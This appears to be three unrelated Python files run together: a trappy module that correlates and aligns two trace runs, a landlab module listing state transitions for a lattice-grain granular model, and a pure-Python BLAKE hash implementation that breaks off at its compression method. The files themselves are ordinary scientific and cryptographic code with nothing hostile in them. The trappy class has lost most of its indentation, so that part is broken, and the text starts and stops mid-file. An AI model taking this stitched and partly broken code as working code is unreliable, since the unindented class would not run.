        smooth_W=5,
        gap_size=0,
        min_block_size=10,
        local_avg_win=25,
        min_frac_in=0.95,
        head_tail_int_method='MEDIAN_INT')
|
|
# Copyright 2015-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""The module responsible for correlation
and related functionality
"""
from trappy.plotter.PlotLayout import PlotLayout
from trappy.stats import StatConf
from trappy.stats.Indexer import get_unified_indexer
import numpy as np
import math
class Correlator(object):
"""Class that allows to align and correlate two
runs
"""
def __init__(self, first, second, **kwargs):
"""
Args:
first (stat.Aggregator): First Aggregator
second (stat.Aggregator): Second Aggregator
"""
self._first_agg = first
self._second_agg = second
self.indexer = get_unified_indexer([first.indexer, second.indexer])
self._corrfunc = kwargs.pop("corrfunc", None)
self._agg_kwargs = kwargs
self.corr_graphs = {}
self._shift = self._align_top_level()
def _resample(self, series, delta=StatConf.DELTA_DEFAULT):
"""Internal method to resample the series
to a uniformally spaces index
Args:
series (pandas.Series): Series io be resampled
delta (float): spacing between indices
Returns:
resampled (pandas.Series)
"""
new_index = self.indexer.get_uniform(delta)
return series.reindex(index=new_index, method="pad")
def correlate(self, level, resample=True):
"""This function returns the correlation between two
runs
Args:
level: The level at which the correlation is
required
Returns:
A normalized correlation value is returned
for each group in the level
"""
result_1 = self._first_agg.aggregate(level=level, **self._agg_kwargs)
result_2 = self._second_agg.aggregate(level=level, **self._agg_kwargs)
corr_output = []
weights = []
for group_id, result_group in enumerate(result_1):
series_x = result_group
series_y = result_2[group_id]
if resample:
series_x = self._resample(series_x)
series_y = self._resample(series_y)
series_x, series_y = shift_series(series_x, series_y, self._shift)
corr_output.append(self._correlate(series_x, series_y))
weights.append(len(series_x[series_x != 0]) + len(series_y[series_y != 0]))
total = 0
for weight, corr in zip(weights, corr_output):
if math.isnan(corr):
continue
total += (weight * corr) / sum(weights)
return corr_output, total
def plot(self, level, per_line=3):
"""Temporary function to plot data. Expected to be
implemented in plotter
"""
num_plots = self._first_agg.topology.level_span(level)
result_1 = self._first_agg.aggregate(level=level, **self._agg_kwargs)
result_2 = self._second_agg.aggregate(level=level, **self._agg_kwargs)
layout = PlotLayout(per_line, num_plots)
plot_index = 0
for group_id, result_group in enumerate(result_1):
s_x = result_group
s_y = result_2[group_id]
s_x = self._resample(s_x)
s_y = self._resample(s_y)
s_x, s_y = shift_series(s_x, s_y, self._shift)
ymax = 1.25 + max(max(s_x.values), max(s_y.values)) + 1
ymin = min(min(s_x.values), min(s_y.values)) - 1
ylim = [ymin, ymax]
ylim = [-1, 3]
axis = layout.get_axis(plot_index)
axis.plot(s_x.index, s_x.values)
axis.plot(s_y.index, s_y.values)
axis.set_ylim(ylim)
plot_index += 1
layout.finish(plot_index)
def _correlate(self, s_x, s_y):
if self._corrfunc != None:
f = self._corrfunc
return f(s_x, s_y)
else:
return s_x.corr(s_y)
def _align_top_level(self):
    """Find the shift that best aligns the two runs' top-level series.

    Both runs are aggregated at the "all" level and resampled, then
    aligned twice: once on their first non-zero samples ("front") and
    once on their last ("back"). The shift whose alignment produces the
    higher correlation wins; a NaN correlation is treated as 0.

    Returns:
        The winning shift (number of samples), as produced by
        :func:`align`.
    """
    result_1 = self._first_agg.aggregate(level="all")
    result_2 = self._second_agg.aggregate(level="all")
    s_x = self._resample(result_1[0])
    s_y = self._resample(result_2[0])
    front_x, front_y, front_shift = align(s_x, s_y, mode="front")
    front_corr = self._correlate(front_x, front_y)
    back_x, back_y, back_shift = align(s_x, s_y, mode="back")
    back_corr = self._correlate(back_x, back_y)
    # NaN correlations (e.g. from constant series) must not win the
    # comparison below, so treat them as zero.
    if math.isnan(back_corr):
        back_corr = 0
    if math.isnan(front_corr):
        front_corr = 0
    if front_corr >= back_corr:
        return front_shift
    else:
        return back_shift
def align(s_x, s_y, mode="front"):
    """Shift the two series so that their non-zero regions line up.

    With ``mode="front"`` the first non-zero samples are made to
    coincide; with ``mode="back"`` the last non-zero samples are used
    instead. If either series is all zeros, both are returned unchanged
    with a shift of 0.

    Returns the (possibly shifted) pair of series and the applied shift.
    """
    p_x = np.flatnonzero(s_x)
    p_y = np.flatnonzero(s_y)
    if not (len(p_x) and len(p_y)):
        return s_x, s_y, 0
    anchor = {"front": 0, "back": -1}
    if mode in anchor:
        p_x = p_x[anchor[mode]]
        p_y = p_y[anchor[mode]]
    shift = p_x - p_y
    s_x, s_y = shift_series(s_x, s_y, shift)
    return s_x, s_y, shift
def shift_series(s_x, s_y, shift):
    """Lag one of the two series by ``|shift|`` samples.

    A positive shift delays ``s_y``; a non-positive shift delays ``s_x``
    by the same magnitude. The other series is returned untouched.
    """
    if shift > 0:
        return s_x, s_y.shift(shift)
    return s_x.shift(-shift), s_y
|
|
# -*- coding: utf-8 -*-
"""
Provide rules and states for a lattice-grain CTS model.
Created on Tue Feb 2 07:37:59 2016
@author: gtucker
"""
from landlab.ca.celllab_cts import Transition
def lattice_grain_node_states():
    """
    Create and return dict of states for lattice-grain model.

    Codes 1-6 are moving particles (one per lattice direction), 0 is
    empty space, 7 is a resting particle, and 8 is a wall.

    Examples
    --------
    >>> nsd = lattice_grain_node_states()
    >>> len(nsd)
    9
    """
    headings = (
        "up",
        "right and up",
        "right and down",
        "down",
        "left and down",
        "left and up",
    )
    states = {0: "empty"}
    for code, heading in enumerate(headings, start=1):
        states[code] = "moving " + heading
    states[7] = "rest"
    states[8] = "wall"
    return states
def lattice_grain_transition_list(g=0.0, f=0.0, motion=1.0, swap=False, callback=None):
    """
    Creates and returns a list of Transition() objects to represent state
    transitions for simple granular mechanics model.

    Parameters
    ----------
    g : float (optional)
        Gravitational parameter. 1/g is the time taken for an initially
        stationary particle to fall one cell width. (Dimensions of 1/time)
    f : float (optional)
        Frictional parameter. Dimensions of 1/time. Probability per unit time
        of a frictional collision, in which one or both colliding particles
        come to a halt.
    motion : float (optional)
        Rate of motion (cells per time unit)
    swap : bool (optional)
        Whether to swap properties for motion transition; set to True if you
        want to track grain position via the 'propid' array.
    callback : function (optional)
        Function to be called after each transition. Used to implement custom
        handling of properties that evolve over time at each cell.

    Returns
    -------
    xn_list : list of Transition objects
        List of objects that encode information about the link-state transitions.

    Notes
    -----
    The transitions for this version of lattice gas have 11 pair-transition
    rules. The shorthand for the states is as follows:

        AR = air/empty
        IN = incoming particle (moving toward its neighbor)
        OU = outgoing particle (moving away from its neighbor)
        IO = incoming at an oblique angle
        OO = outgoing at an oblique angle
        RE = rest particle
        WA = wall particle
        op = oblique pair moving in opposite perpendicular direction
        sm = oblique pair moving in same perpendicular direction

    The 11 pairs with transitions are:

    1. AR-IN => IN-AR (move to empty particle)
    2. IN-IN => OO-OO-op (1/3 each dir), OU-OU (1/3) (head-on collision)
    3. IN-IO => OO-OU (oblique collision)
    4. IN-OO => IO-OU (oblique collision from behind)
    5. IN-OU => IO-OO (1/4 each of 2 directions) (collision from behind)
    6. IN-RE => RE-OU (1/3) RE-OO (1/3 each dir) (collision with rest)
    7. IN-WA => OU-WA (1/3) OO-WA (1/3 each dir) (wall collision)
    8. IO-IO-op => OO-OO-op (1/2 each dir) (glacing collision)
    9. IO-IO-sm => OO-OO-sm (30-degree collision)
    10. IO-RE => RE-OU (oblique collision with rest particle)
    11. IO-WA => OO-WA (oblique collision with wall)

    Examples
    --------
    >>> xnl = lattice_grain_transition_list()
    >>> len(xnl)  # 6 motion plus 117 elastic
    123
    >>> def fn():
    ...     return 'test'
    >>> xnl = lattice_grain_transition_list(f=1.0, callback=fn)
    >>> len(xnl)  # 6 motion plus 87 frictional
    93
    >>> xnl[0].prop_update_fn()
    'test'
    >>> xnl = lattice_grain_transition_list(g=1.0, f=1.0, swap=True)
    >>> len(xnl)  # 6 motion plus 87 frictional plus 48 gravitational
    141
    >>> xnl[5].swap_properties
    True
    >>> xnl[6].swap_properties
    False
    """
    xn_list = []

    # Set elastic-response rate, and scale frictional-response rate to motion
    # rate
    p_elast = motion * (1.0 - f)  # rate of elastic (non-dissipative) collision
    f *= motion

    def add(rate, name, pairs, do_swap=False):
        # Append one Transition per (old, new) link-state pair, all sharing
        # the same rate, name, swap flag, and callback. List order is
        # preserved, so transition indices match the original hand-written
        # version (the doctests above rely on this).
        for old, new in pairs:
            xn_list.append(Transition(old, new, rate, name, do_swap, callback))

    # Rule 1: Transitions for particle movement into an empty cell
    add(motion, "motion", [
        ((1, 0, 0), (0, 1, 0)),
        ((2, 0, 1), (0, 2, 1)),
        ((3, 0, 2), (0, 3, 2)),
        ((0, 4, 0), (4, 0, 0)),
        ((0, 5, 1), (5, 0, 1)),
        ((0, 6, 2), (6, 0, 2)),
    ], do_swap=swap)

    # Rule 2: Transitions for head-on collision: elastic
    if p_elast > 0.0:
        add(p_elast / 3, "head-on collision", [
            ((1, 4, 0), (4, 1, 0)),
            ((1, 4, 0), (3, 6, 0)),
            ((1, 4, 0), (5, 2, 0)),
            ((2, 5, 1), (5, 2, 1)),
            ((2, 5, 1), (4, 1, 1)),
            ((2, 5, 1), (6, 3, 1)),
            ((3, 6, 2), (6, 3, 2)),
            ((3, 6, 2), (1, 4, 2)),
            ((3, 6, 2), (5, 2, 2)),
        ])

    # Rule 2: Transitions for head-on collision: frictional dissipation
    if f > 0.0:
        add(f, "head-on collision", [
            ((1, 4, 0), (7, 7, 0)),
            ((2, 5, 1), (7, 7, 1)),
            ((3, 6, 2), (7, 7, 2)),
        ])

    # Rule 3: Transitions for oblique collision: elastic
    if p_elast > 0.0:
        add(p_elast, "oblique collision", [
            ((1, 3, 0), (3, 1, 0)),
            ((1, 5, 0), (5, 1, 0)),
            ((2, 4, 0), (4, 2, 0)),
            ((6, 4, 0), (4, 6, 0)),
            ((2, 4, 1), (4, 2, 1)),
            ((2, 6, 1), (6, 2, 1)),
            ((1, 5, 1), (5, 1, 1)),
            ((3, 5, 1), (5, 3, 1)),
            ((3, 1, 2), (1, 3, 2)),
            ((3, 5, 2), (5, 3, 2)),
            ((2, 6, 2), (6, 2, 2)),
            ((4, 6, 2), (6, 4, 2)),
        ])

    # Rule 3 frictional
    if f > 0.0:
        add(f, "oblique collision", [
            ((1, 3, 0), (7, 7, 0)),
            ((1, 5, 0), (7, 7, 0)),
            ((2, 4, 0), (7, 7, 0)),
            ((6, 4, 0), (7, 7, 0)),
            ((2, 4, 1), (7, 7, 1)),
            ((2, 6, 1), (7, 7, 1)),
            ((1, 5, 1), (7, 7, 1)),
            ((3, 5, 1), (7, 7, 1)),
            ((3, 1, 2), (7, 7, 2)),
            ((3, 5, 2), (7, 7, 2)),
            ((2, 6, 2), (7, 7, 2)),
            ((4, 6, 2), (7, 7, 2)),
        ])

    # Rule 4: Transitions for oblique-from-behind collisions
    if p_elast > 0.0:
        add(p_elast, "oblique", [
            ((1, 2, 0), (2, 1, 0)),
            ((1, 6, 0), (6, 1, 0)),
            ((3, 4, 0), (4, 3, 0)),
            ((5, 4, 0), (4, 5, 0)),
            ((2, 1, 1), (1, 2, 1)),
            ((2, 3, 1), (3, 2, 1)),
            ((4, 5, 1), (5, 4, 1)),
            ((6, 5, 1), (5, 6, 1)),
            ((3, 2, 2), (2, 3, 2)),
            ((3, 4, 2), (4, 3, 2)),
            ((1, 6, 2), (6, 1, 2)),
            ((5, 6, 2), (6, 5, 2)),
        ])

    # Rule 4 frictional
    if f > 0.0:
        add(f, "oblique", [
            ((1, 2, 0), (7, 1, 0)),
            ((1, 6, 0), (7, 1, 0)),
            ((3, 4, 0), (4, 7, 0)),
            ((5, 4, 0), (4, 7, 0)),
            ((2, 1, 1), (7, 2, 1)),
            ((2, 3, 1), (7, 2, 1)),
            ((4, 5, 1), (5, 7, 1)),
            ((6, 5, 1), (5, 7, 1)),
            ((3, 2, 2), (7, 3, 2)),
            ((3, 4, 2), (7, 3, 2)),
            ((1, 6, 2), (6, 7, 2)),
            ((5, 6, 2), (6, 7, 2)),
        ])

    # Rule 5: Transitions for direct-from-behind collisions
    if p_elast > 0.0:
        add(p_elast / 4, "behind", [
            ((1, 1, 0), (2, 6, 0)),
            ((1, 1, 0), (6, 2, 0)),
            ((4, 4, 0), (3, 5, 0)),
            ((4, 4, 0), (5, 3, 0)),
            ((2, 2, 1), (1, 3, 1)),
            ((2, 2, 1), (3, 1, 1)),
            ((5, 5, 1), (4, 6, 1)),
            ((5, 5, 1), (6, 4, 1)),
            ((3, 3, 2), (2, 4, 2)),
            ((3, 3, 2), (4, 2, 2)),
            ((6, 6, 2), (1, 5, 2)),
            ((6, 6, 2), (5, 1, 2)),
        ])

    # Rule 5 frictional
    if f > 0.0:
        add(f / 4, "behind", [
            ((1, 1, 0), (7, 1, 0)),
            ((4, 4, 0), (4, 7, 0)),
            ((2, 2, 1), (7, 2, 1)),
            ((5, 5, 1), (5, 7, 1)),
            ((3, 3, 2), (7, 3, 2)),
            ((6, 6, 2), (6, 7, 2)),
        ])

    # Rule 6: Transitions for direct collision with stationary (resting) particle
    if p_elast > 0.0:
        add(p_elast / 3.0, "rest", [
            ((1, 7, 0), (7, 1, 0)),
            ((1, 7, 0), (7, 2, 0)),
            ((1, 7, 0), (7, 6, 0)),
            ((7, 4, 0), (4, 7, 0)),
            ((7, 4, 0), (3, 7, 0)),
            ((7, 4, 0), (5, 7, 0)),
            ((2, 7, 1), (7, 2, 1)),
            ((2, 7, 1), (7, 1, 1)),
            ((2, 7, 1), (7, 3, 1)),
            ((7, 5, 1), (5, 7, 1)),
            ((7, 5, 1), (4, 7, 1)),
            ((7, 5, 1), (6, 7, 1)),
            ((3, 7, 2), (7, 3, 2)),
            ((3, 7, 2), (7, 2, 2)),
            ((3, 7, 2), (7, 4, 2)),
            ((7, 6, 2), (6, 7, 2)),
            ((7, 6, 2), (1, 7, 2)),
            ((7, 6, 2), (5, 7, 2)),
        ])

    # Rule 6 frictional
    if f > 0.0:
        add(f, "rest", [
            ((1, 7, 0), (7, 7, 0)),
            ((7, 4, 0), (7, 7, 0)),
            ((2, 7, 1), (7, 7, 1)),
            ((7, 5, 1), (7, 7, 1)),
            ((3, 7, 2), (7, 7, 2)),
            ((7, 6, 2), (7, 7, 2)),
        ])

    # Rule 7: Transitions for wall impact
    if p_elast > 0.0:
        add(p_elast / 3, "wall rebound", [
            ((1, 8, 0), (4, 8, 0)),
            ((1, 8, 0), (3, 8, 0)),
            ((1, 8, 0), (5, 8, 0)),
            ((2, 8, 1), (5, 8, 1)),
            ((2, 8, 1), (4, 8, 1)),
            ((2, 8, 1), (6, 8, 1)),
            ((3, 8, 2), (6, 8, 2)),
            ((3, 8, 2), (5, 8, 2)),
            ((3, 8, 2), (1, 8, 2)),
            ((8, 4, 0), (8, 1, 0)),
            ((8, 4, 0), (8, 6, 0)),
            ((8, 4, 0), (8, 2, 0)),
            ((8, 5, 1), (8, 1, 1)),
            ((8, 5, 1), (8, 2, 1)),
            ((8, 5, 1), (8, 3, 1)),
            ((8, 6, 2), (8, 2, 2)),
            ((8, 6, 2), (8, 3, 2)),
            ((8, 6, 2), (8, 4, 2)),
        ])

    # Rule 7 frictional
    if f > 0.0:
        add(f, "wall rebound", [
            ((1, 8, 0), (7, 8, 0)),
            ((2, 8, 1), (7, 8, 1)),
            ((3, 8, 2), (7, 8, 2)),
            ((8, 4, 0), (8, 7, 0)),
            ((8, 5, 1), (8, 7, 1)),
            ((8, 6, 2), (8, 7, 2)),
        ])

    # Rule 8: Transitions for glancing oblique collision
    if p_elast > 0.0:
        add(p_elast, "glancing", [
            ((2, 5, 0), (3, 6, 0)),
            ((6, 3, 0), (5, 2, 0)),
            ((3, 6, 1), (4, 1, 1)),
            ((1, 4, 1), (6, 3, 1)),
            ((4, 1, 2), (5, 2, 2)),
            ((2, 5, 2), (1, 4, 2)),
        ])

    # Rule 8 frictional
    if f > 0.0:
        add(f, "glancing", [
            ((2, 5, 0), (7, 7, 0)),
            ((6, 3, 0), (7, 7, 0)),
            ((3, 6, 1), (7, 7, 1)),
            ((1, 4, 1), (7, 7, 1)),
            ((4, 1, 2), (7, 7, 2)),
            ((2, 5, 2), (7, 7, 2)),
        ])

    # Rule 9: Transitions for "near-on" collisions
    if p_elast > 0.0:
        add(p_elast, "near-on", [
            ((6, 5, 0), (5, 6, 0)),
            ((2, 3, 0), (3, 2, 0)),
            ((1, 6, 1), (6, 1, 1)),
            ((3, 4, 1), (4, 3, 1)),
            ((2, 1, 2), (1, 2, 2)),
            ((4, 5, 2), (5, 4, 2)),
        ])

    # Rule 9 frictional
    if f > 0.0:
        add(f / 2, "near-on", [
            ((6, 5, 0), (7, 6, 0)),
            ((6, 5, 0), (5, 7, 0)),
            ((2, 3, 0), (7, 2, 0)),
            ((2, 3, 0), (3, 7, 0)),
            ((1, 6, 1), (7, 1, 1)),
            ((1, 6, 1), (6, 7, 1)),
            ((3, 4, 1), (7, 3, 1)),
            ((3, 4, 1), (4, 7, 1)),
            ((2, 1, 2), (7, 2, 2)),
            ((2, 1, 2), (1, 7, 2)),
            ((4, 5, 2), (7, 4, 2)),
            ((4, 5, 2), (5, 7, 2)),
        ])

    # Rule 10: Transitions for oblique collision with rest particle
    if p_elast > 0.0:
        add(p_elast, "oblique with rest", [
            ((2, 7, 0), (7, 1, 0)),
            ((6, 7, 0), (7, 1, 0)),
            ((7, 3, 0), (4, 7, 0)),
            ((7, 5, 0), (4, 7, 0)),
            ((3, 7, 1), (7, 2, 1)),
            ((1, 7, 1), (7, 2, 1)),
            ((7, 6, 1), (5, 7, 1)),
            ((7, 4, 1), (5, 7, 1)),
            ((4, 7, 2), (7, 3, 2)),
            ((2, 7, 2), (7, 3, 2)),
            ((7, 5, 2), (6, 7, 2)),
            ((7, 1, 2), (6, 7, 2)),
        ])

    # Rule 10 frictional
    if f > 0.0:
        add(f, "oblique with rest", [
            ((2, 7, 0), (7, 7, 0)),
            ((6, 7, 0), (7, 7, 0)),
            ((7, 3, 0), (7, 7, 0)),
            ((7, 5, 0), (7, 7, 0)),
            ((3, 7, 1), (7, 7, 1)),
            ((1, 7, 1), (7, 7, 1)),
            ((7, 6, 1), (7, 7, 1)),
            ((7, 4, 1), (7, 7, 1)),
            ((4, 7, 2), (7, 7, 2)),
            ((2, 7, 2), (7, 7, 2)),
            ((7, 5, 2), (7, 7, 2)),
            ((7, 1, 2), (7, 7, 2)),
        ])

    # Rule 11: Transitions for oblique collision with wall particle
    if p_elast > 0.0:
        add(p_elast, "oblique with wall", [
            ((2, 8, 0), (3, 8, 0)),
            ((6, 8, 0), (5, 8, 0)),
            ((8, 3, 0), (8, 2, 0)),
            ((8, 5, 0), (8, 6, 0)),
            ((1, 8, 1), (6, 8, 1)),
            ((3, 8, 1), (4, 8, 1)),
            ((8, 4, 1), (8, 3, 1)),
            ((8, 6, 1), (8, 1, 1)),
            ((4, 8, 2), (5, 8, 2)),
            ((2, 8, 2), (1, 8, 2)),
            ((8, 1, 2), (8, 2, 2)),
            ((8, 5, 2), (8, 4, 2)),
        ])

    # Rule 11 frictional
    if f > 0.0:
        add(f, "oblique with wall", [
            ((2, 8, 0), (7, 8, 0)),
            ((6, 8, 0), (7, 8, 0)),
            ((8, 3, 0), (8, 7, 0)),
            ((8, 5, 0), (8, 7, 0)),
            ((1, 8, 1), (7, 8, 1)),
            ((3, 8, 1), (7, 8, 1)),
            ((8, 4, 1), (8, 7, 1)),
            ((8, 6, 1), (8, 7, 1)),
            ((4, 8, 2), (7, 8, 2)),
            ((2, 8, 2), (7, 8, 2)),
            ((8, 1, 2), (8, 7, 2)),
            ((8, 5, 2), (8, 7, 2)),
        ])

    # Gravity rule 1: rising particles become rest particles
    # (the left cell may be in any of the 9 states)
    if g > 0.0:
        add(g, "gravity 1", [((k, 1, 0), (k, 7, 0)) for k in range(9)])

    # Gravity rule 2: resting particles become falling particles (if above air)
    if g > 0.0:
        add(g, "gravity 2", [((0, 7, 0), (0, 4, 0))])

    # Gravity rule 3: up/sideways particles become down/sideways particles
    if g > 0.0:
        add(g, "gravity 3",
            [((k, 2, 0), (k, 3, 0)) for k in range(9)]
            + [((k, 6, 0), (k, 5, 0)) for k in range(9)])

    # Gravity rule 4: down/side to straight down
    if g > 0.0:
        add(g, "gravity 4",
            [((k, 3, 0), (k, 4, 0)) for k in range(9)]
            + [((k, 5, 0), (k, 4, 0)) for k in range(9)])

    # Gravity rule for lateral destabilization (represents grain
    # motion above angle of repose on sloping surface)
    if g > 0.0:
        add(g / 2.0, "gravity", [
            ((7, 0, 2), (3, 0, 2)),
            ((0, 7, 1), (0, 5, 1)),
        ])

    return xn_list
|
|
# Long-form module header for blake.py, kept as a plain string constant:
# history, usage notes, comparative timings, and the author's license /
# disclaimer text. Runtime text — reproduced verbatim, not reformatted.
intro = """
blake.py
version 5, 2-Apr-2014
BLAKE is a SHA3 round-3 finalist designed and submitted by
Jean-Philippe Aumasson et al.
At the core of BLAKE is a ChaCha-like mixer, very similar
to that found in the stream cipher, ChaCha8. Besides being
a very good mixer, ChaCha is fast.
References:
http://www.131002.net/blake/
http://csrc.nist.gov/groups/ST/hash/sha-3/index.html
http://en.wikipedia.org/wiki/BLAKE_(hash_function)
This implementation assumes all data is in increments of
whole bytes. (The formal definition of BLAKE allows for
hashing individual bits.) Note too that this implementation
does include the round-3 tweaks where the number of rounds
was increased to 14/16 from 10/14.
This version can be imported into both Python2 (2.6 and 2.7)
and Python3 programs. Python 2.5 requires an older version
of blake.py (version 4).
Here are some comparative times for different versions of
Python:
64-bit:
2.6 6.284s
2.7 6.343s
3.2 7.620s
pypy (2.7) 2.080s
32-bit:
2.5 (32) 15.389s (with psyco)
2.7-32 13.645s
3.2-32 12.574s
One test on a 2.0GHz Core 2 Duo of 10,000 iterations of
BLAKE-256 on a short message produced a time of 5.7 seconds.
Not bad, but if raw speed is what you want, look to the
the C version. It is 40x faster and did the same thing
in 0.13 seconds.
Copyright (c) 2009-2012 by Larry Bugbee, Kent, WA
ALL RIGHTS RESERVED.
blake.py IS EXPERIMENTAL SOFTWARE FOR EDUCATIONAL
PURPOSES ONLY. IT IS MADE AVAILABLE "AS-IS" WITHOUT
WARRANTY OR GUARANTEE OF ANY KIND. USE SIGNIFIES
ACCEPTANCE OF ALL RISK.
To make your learning and experimentation less cumbersome,
blake.py is free for any use.
Enjoy,
Larry Bugbee
March 2011
rev May 2011 - fixed Python version check (tx JP)
rev Apr 2012 - fixed an out-of-order bit set in final()
- moved self-test to a separate test pgm
- this now works with Python2 and Python3
rev Apr 2014 - added test and conversion of string input
to byte string in update() (tx Soham)
- added hexdigest() method.
- now support state 3 so only one call to
final() per instantiation is allowed. all
subsequent calls to final(), digest() or
hexdigest() simply return the stored value.
"""
import struct
from binascii import hexlify, unhexlify
#---------------------------------------------------------------
class BLAKE(object):
    """BLAKE hash function (a SHA-3 finalist), pure Python.

    Supports all four digest sizes: 224/256 bits (32-bit words) and
    384/512 bits (64-bit words).  Typical use: construct with the
    digest length in bits, optionally addsalt(), call update() any
    number of times, then final()/digest()/hexdigest().
    """
    # - - - - - - - - - - - - - - - - - - - - - - - - - - -
    # initial values, constants and padding

    # IVx for BLAKE-x
    IV64 = [
        0x6A09E667F3BCC908, 0xBB67AE8584CAA73B,
        0x3C6EF372FE94F82B, 0xA54FF53A5F1D36F1,
        0x510E527FADE682D1, 0x9B05688C2B3E6C1F,
        0x1F83D9ABFB41BD6B, 0x5BE0CD19137E2179,
    ]

    IV48 = [
        0xCBBB9D5DC1059ED8, 0x629A292A367CD507,
        0x9159015A3070DD17, 0x152FECD8F70E5939,
        0x67332667FFC00B31, 0x8EB44A8768581511,
        0xDB0C2E0D64F98FA7, 0x47B5481DBEFA4FA4,
    ]

    # note: the values here are the same as the high-order
    # half-words of IV64
    IV32 = [
        0x6A09E667, 0xBB67AE85,
        0x3C6EF372, 0xA54FF53A,
        0x510E527F, 0x9B05688C,
        0x1F83D9AB, 0x5BE0CD19,
    ]

    # note: the values here are the same as the low-order
    # half-words of IV48
    IV28 = [
        0xC1059ED8, 0x367CD507,
        0x3070DD17, 0xF70E5939,
        0xFFC00B31, 0x68581511,
        0x64F98FA7, 0xBEFA4FA4,
    ]

    # constants for BLAKE-64 and BLAKE-48
    C64 = [
        0x243F6A8885A308D3, 0x13198A2E03707344,
        0xA4093822299F31D0, 0x082EFA98EC4E6C89,
        0x452821E638D01377, 0xBE5466CF34E90C6C,
        0xC0AC29B7C97C50DD, 0x3F84D5B5B5470917,
        0x9216D5D98979FB1B, 0xD1310BA698DFB5AC,
        0x2FFD72DBD01ADFB7, 0xB8E1AFED6A267E96,
        0xBA7C9045F12C7F99, 0x24A19947B3916CF7,
        0x0801F2E2858EFC16, 0x636920D871574E69,
    ]

    # constants for BLAKE-32 and BLAKE-28
    # note: concatenate and the values are the same as the values
    # for the 1st half of C64
    C32 = [
        0x243F6A88, 0x85A308D3,
        0x13198A2E, 0x03707344,
        0xA4093822, 0x299F31D0,
        0x082EFA98, 0xEC4E6C89,
        0x452821E6, 0x38D01377,
        0xBE5466CF, 0x34E90C6C,
        0xC0AC29B7, 0xC97C50DD,
        0x3F84D5B5, 0xB5470917,
    ]

    # the 10 permutations of {0,...,15}, repeated so that a round
    # index of up to 19 (16 rounds max are used) indexes directly
    SIGMA = [
        [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14,15],
        [14,10, 4, 8, 9,15,13, 6, 1,12, 0, 2,11, 7, 5, 3],
        [11, 8,12, 0, 5, 2,15,13,10,14, 3, 6, 7, 1, 9, 4],
        [ 7, 9, 3, 1,13,12,11,14, 2, 6, 5,10, 4, 0,15, 8],
        [ 9, 0, 5, 7, 2, 4,10,15,14, 1,11,12, 6, 8, 3,13],
        [ 2,12, 6,10, 0,11, 8, 3, 4,13, 7, 5,15,14, 1, 9],
        [12, 5, 1,15,14,13, 4,10, 0, 7, 6, 3, 9, 2, 8,11],
        [13,11, 7,14,12, 1, 3, 9, 5, 0,15, 4, 8, 6, 2,10],
        [ 6,15,14, 9,11, 3, 0, 8,12, 2,13, 7, 1, 4,10, 5],
        [10, 2, 8, 4, 7, 6, 1, 5,15,11, 9,14, 3,12,13, 0],
        [ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14,15],
        [14,10, 4, 8, 9,15,13, 6, 1,12, 0, 2,11, 7, 5, 3],
        [11, 8,12, 0, 5, 2,15,13,10,14, 3, 6, 7, 1, 9, 4],
        [ 7, 9, 3, 1,13,12,11,14, 2, 6, 5,10, 4, 0,15, 8],
        [ 9, 0, 5, 7, 2, 4,10,15,14, 1,11,12, 6, 8, 3,13],
        [ 2,12, 6,10, 0,11, 8, 3, 4,13, 7, 5,15,14, 1, 9],
        [12, 5, 1,15,14,13, 4,10, 0, 7, 6, 3, 9, 2, 8,11],
        [13,11, 7,14,12, 1, 3, 9, 5, 0,15, 4, 8, 6, 2,10],
        [ 6,15,14, 9,11, 3, 0, 8,12, 2,13, 7, 1, 4,10, 5],
        [10, 2, 8, 4, 7, 6, 1, 5,15,11, 9,14, 3,12,13, 0],
    ]

    MASK32BITS = 0xFFFFFFFF
    MASK64BITS = 0xFFFFFFFFFFFFFFFF

    # - - - - - - - - - - - - - - - - - - - - - - - - - - -

    def __init__(self, hashbitlen):
        """
        load the hash state structure (copy hashbitlen...)
        hashbitlen: length of the hash output (224, 256, 384 or 512)
        """
        if hashbitlen not in [224, 256, 384, 512]:
            raise Exception('hash length not 224, 256, 384 or 512')

        self.hashbitlen = hashbitlen
        self.h = [0]*8  # current chain value (initialized to the IV)
        self.t = 0  # number of *BITS* hashed so far
        self.cache = b''  # cached leftover data not yet compressed
        self.salt = [0]*4  # salt (null by default)
        self.state = 1  # set to 2 by update and 3 by final
        self.nullt = 0  # Boolean value for special case \ell_i=0

        # The algorithm is the same for both the 32- and 64- versions
        # of BLAKE.  The difference is in word size (4 vs 8 bytes),
        # blocksize (64 vs 128 bytes), number of rounds (14 vs 16)
        # and a few very specific constants.
        if (hashbitlen == 224) or (hashbitlen == 256):
            # setup for 32-bit words and 64-bit block
            self.byte2int = self._fourByte2int
            self.int2byte = self._int2fourByte
            self.MASK = self.MASK32BITS
            self.WORDBYTES = 4
            self.WORDBITS = 32
            self.BLKBYTES = 64
            self.BLKBITS = 512
            self.ROUNDS = 14  # was 10 before round 3
            self.cxx = self.C32
            self.rot1 = 16  # num bits to shift in G
            self.rot2 = 12  # num bits to shift in G
            self.rot3 = 8   # num bits to shift in G
            self.rot4 = 7   # num bits to shift in G
            self.mul = 0    # for 32-bit words, 32<<self.mul where self.mul = 0

            # 224- and 256-bit versions (32-bit words)
            if hashbitlen == 224:
                self.h = self.IV28[:]
            else:
                self.h = self.IV32[:]

        elif (hashbitlen == 384) or (hashbitlen == 512):
            # setup for 64-bit words and 128-bit block
            self.byte2int = self._eightByte2int
            self.int2byte = self._int2eightByte
            self.MASK = self.MASK64BITS
            self.WORDBYTES = 8
            self.WORDBITS = 64
            self.BLKBYTES = 128
            self.BLKBITS = 1024
            self.ROUNDS = 16  # was 14 before round 3
            self.cxx = self.C64
            self.rot1 = 32  # num bits to shift in G
            self.rot2 = 25  # num bits to shift in G
            self.rot3 = 16  # num bits to shift in G
            self.rot4 = 11  # num bits to shift in G
            self.mul = 1    # for 64-bit words, 32<<self.mul where self.mul = 1

            # 384- and 512-bit versions (64-bit words)
            if hashbitlen == 384:
                self.h = self.IV48[:]
            else:
                self.h = self.IV64[:]

    # - - - - - - - - - - - - - - - - - - - - - - - - - - -

    def _compress(self, block):
